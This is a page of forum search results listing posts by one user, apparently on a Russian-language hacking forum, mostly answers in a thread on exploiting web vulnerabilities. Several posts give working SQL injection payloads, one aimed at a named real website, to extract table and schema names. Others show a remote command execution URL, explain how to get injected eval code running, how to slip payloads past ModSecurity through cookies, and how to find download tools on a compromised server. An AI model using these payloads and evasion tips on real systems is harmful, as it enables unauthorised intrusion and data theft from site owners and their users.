 |
 |
 | |
 | |
| |
 |
 |
FORUMS | |
MEMBERS | |
RECENT POSTS |  |
LOG IN |
|
||||||
|
Показано с 1 по 25 из 264.
На поиск затрачено 0.02 сек. Поиск: Сообщения от: Redwood |
Раздел: Уязвимости
19.07.2012, 05:01
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 616,681
Автор
Redwood
Долго писал ответ с разными вариантами, но потом...Долго писал ответ с разными вариантами, но потом вспомнил, про старый пост Джока по этой теме: /threadnav43966-5-10.html пост #48 - #50 если я правильно понял проблему |
|
Раздел: Уязвимости
20.06.2012, 05:30
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 616,681
Автор
Redwood
http://wow.igrosfera.net/acp/index.php?modul=stati...http://wow.igrosfera.net/acp/index.php?modul=static&id=3+and+extractvalue(1,(select+concat(0x2a,(select+table_name+from+information_schema.tables+where+table_schema!='information_schema'+limit+0,1)))) |
|
Раздел: Уязвимости
07.10.2011, 15:34
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 616,681
Автор
Redwood
/showpost.php?p=2582303&postcount=16413
Выше.../showpost.php?p=2582303&postcount=16413 Выше на несколько постов Expl0ited'ом на живом примере приведен аналогичный способ проведения инъекции с выводом в ошибку Duplicate Entry, разве что только... |
|
Раздел: Песочница
05.10.2011, 05:49
|
|
Ответов: 15
Просмотров: 7,919
Автор
Redwood
Может палиться название какой нибудь функции,...Может палиться название какой нибудь функции, типа WsoLogin(); |
|
Раздел: Статьи
17.08.2011, 01:59
|
|
Ответов: 111
Просмотров: 34,412
Автор
Redwood
Давно подозревал, что GRRRL Power - это мульт...Давно подозревал, что GRRRL Power - это мульт d_x'а. P.S. C возвращением |
|
Раздел: Уязвимости
27.07.2011, 19:31
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 616,681
Автор
Redwood
site.ru/logs/logs.php?op=1&cmd=[системная...site.ru/logs/logs.php?op=1&cmd=[системная команда] Например: site.ru/logs/logs.php?op=1&cmd=ls -la |
|
Раздел: Уязвимости
20.07.2011, 16:10
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 616,681
Автор
Redwood
Sloneny
Тебе нужно выйти за кавычки, иначе...Sloneny Тебе нужно выйти за кавычки, иначе получается, что переменная $hc_cfg6 имеет тип string и содержит строку eval($_GET[e]); соответственно код выполняться не будет Вписываешь что то вроде... |
|
Раздел: Уязвимости
28.06.2011, 22:32
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 616,681
Автор
Redwood
Ну раз сканер, тогда это координально меняет...Ну раз сканер, тогда это координально меняет ситуацию |
|
Раздел: Уязвимости
18.05.2011, 18:53
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 616,681
Автор
Redwood
|
|
Раздел: Статьи
27.04.2011, 02:44
|
|
Ответов: 61
Просмотров: 42,972
Автор
Redwood
Статья не о чем
DDoS атаки или новый взгляд...Статья не о чем DDoS атаки или новый взгляд на Server-Kill Ничего нового не увидел P.S. Уровень ачата падает в геометрической прогрессии |
|
Раздел: Уязвимости
15.04.2011, 19:37
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 616,681
Автор
Redwood
Домашнее задание на выходные для всех кулхацкеров...Домашнее задание на выходные для всех кулхацкеров из этого треда и вообще раздела уязвимости: открыть документацию по MySQL и прочитать про виды комментариев. Невозможно уже на это смотреть. |
|
Раздел: Уязвимости
25.03.2011, 18:12
|
|
Ответов: 12
Просмотров: 12,598
Автор
Redwood
|
|
Раздел: Уязвимости
21.03.2011, 23:20
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 616,681
Автор
Redwood
Вывод уязвимого поля на страницу, на вывод в...Вывод уязвимого поля на страницу, на вывод в ошибке не влияет. Вывод отработает и при таком коде: |
|
Раздел: Уязвимости
21.03.2011, 21:32
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 616,681
Автор
Redwood
|
|
Раздел: Уязвимости
21.03.2011, 00:11
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 616,681
Автор
Redwood
-1+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT...-1+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((SELECT+GROUP_CONCAT(SCHEMA_NAME)+FROM+INFORMATION_SCHEMA.SCHEMATA),1,63),FLOOR(RAND(0)*2))) |
|
Раздел: Уязвимости
18.03.2011, 05:17
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 616,681
Автор
Redwood
Судя по всему, тебя режет директива Mod Security...Судя по всему, тебя режет директива Mod Security SecRequestBodyLimit, которая проверяет, чтобы размер тела запроса не превышал указанного значения. ... |
|
Раздел: Уязвимости
18.03.2011, 05:13
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 616,681
Автор
Redwood
Сервер защищен Mod Security. По дефолту Mod...Сервер защищен Mod Security. По дефолту Mod Security не фильтрует значения Cookies, пробуй передать через них. |
|
Раздел: Уязвимости
05.03.2011, 15:17
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 616,681
Автор
Redwood
То, что там два запроса, это верно, но не нужно...То, что там два запроса, это верно, но не нужно сразу советовать крутить как слепую. Количество запросов на вывод не влияет, если вывод есть, то он будет. 1NtR0 ... |
|
Раздел: Уязвимости
05.03.2011, 12:36
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 616,681
Автор
Redwood
Таблица tables содержит 5 колонок (количество...Таблица tables содержит 5 колонок (количество полей в левой и правой части запроса должно совпадать) Вписывая в поле ' )-- - Запрос принимает вид INSERT INTO tables VALUES ('')-- - ... |
|
Раздел: Песочница
05.03.2011, 11:50
|
|
Ответов: 21
Просмотров: 27,579
Автор
Redwood
Например так
(-1)union(select(1),2,3)
...Например так (-1)union(select(1),2,3) (-1)union(select(table_name),2,(3)from(information_schema.tables)) Ну и далее перебирать нужные таблицы |
|
Раздел: Уязвимости
03.03.2011, 16:50
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 616,681
Автор
Redwood
curl, fetch, links, lynx, get
Проверить...curl, fetch, links, lynx, get Проверить наличие качалок можно команой which. В консоли: which curl, если качалка установлена, то в ответ получишь /usr/bin/curl (полный путь к исполняемому файлу... |
|
Раздел: Уязвимости
22.02.2011, 00:05
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 616,681
Автор
Redwood
Не важно, что там стоит, я просто показал, что...Не важно, что там стоит, я просто показал, что после знака комментария должен стоять пробел. |
|
Раздел: Уязвимости
21.02.2011, 23:40
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 616,681
Автор
Redwood
Не знаю, что и куда ты там вводишь, но твой...Не знаю, что и куда ты там вводишь, но твой скрипт даже не запуститься, потому что он синтаксически неверен. Правильно: $db=mysql_query("SELECT * FROM table WHERE id=' ".$_GET['id']." ' "); ... |
|
Раздел: Уязвимости
21.02.2011, 14:55
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 616,681
Автор
Redwood
Это несовпадение типов данных, вывод...Это несовпадение типов данных, вывод напрашивается сам по себе. |
|
Раздел: Уязвимости
20.02.2011, 20:22
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 616,681
Автор
Redwood
Этот метод работает не везде.
...Этот метод работает не везде. https://forum.antichat.net/thread98525.html |
| Показано с 1 по 25 из 264. |
